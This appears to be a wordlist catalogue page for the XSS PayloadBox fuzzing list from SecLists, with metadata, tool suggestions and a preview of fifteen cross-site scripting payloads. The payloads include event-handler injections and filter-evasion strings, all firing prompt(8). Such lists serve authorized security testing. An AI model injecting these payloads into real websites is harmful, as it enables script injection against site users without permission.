Skip to content
Fuzzing184 KB

XSS PayloadBox List

The large payloadbox XSS payload collection mirrored in SecLists, with thousands of vectors and obfuscation variants. A high-coverage list for thorough XSS fuzzing.

View source
Size
184 KB
Category
Fuzzing
Source
danielmiessler/SecLists
License
MIT
Recommended tools
wfuzzburpffuf

Preview

First 15 entries. Download or copy the full list (184 KB) using the buttons above.

>head xss-payloadbox.txt184 KB
"-prompt(8)-"
'-prompt(8)-'
";a=prompt,a()//
';a=prompt,a()//
'-eval("window['pro'%2B'mpt'](8)")-'
"-eval("window['pro'%2B'mpt'](8)")-"
"onclick=prompt(8)>"@x.y
"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y
<image/src/onerror=prompt(8)>
<img/src/onerror=prompt(8)>
<image src/onerror=prompt(8)>
<img src/onerror=prompt(8)>
<image src =q onerror=prompt(8)>
<img src =q onerror=prompt(8)>
</scrip</script>t><img src =q onerror=prompt(8)>

The large payloadbox XSS payload collection mirrored in SecLists, with thousands of vectors and obfuscation variants. A high-coverage list for thorough XSS fuzzing.

This list is geared toward input fuzzing and vulnerability discovery. It contains roughly 184 KB and pairs well with tools such as wfuzz, burp, ffuf. Pick the smallest list that fits your engagement: shorter lists are faster and quieter for online attacks, while larger lists give broader coverage for offline work where speed is less of a constraint.

You can copy the sample preview straight from this page, copy the entire list to your clipboard, or download the raw .txt file. The full list is served directly from its upstream source on GitHub.

Sourced from danielmiessler/SecLists and distributed under MIT. Only use wordlists against systems you are explicitly authorized to test.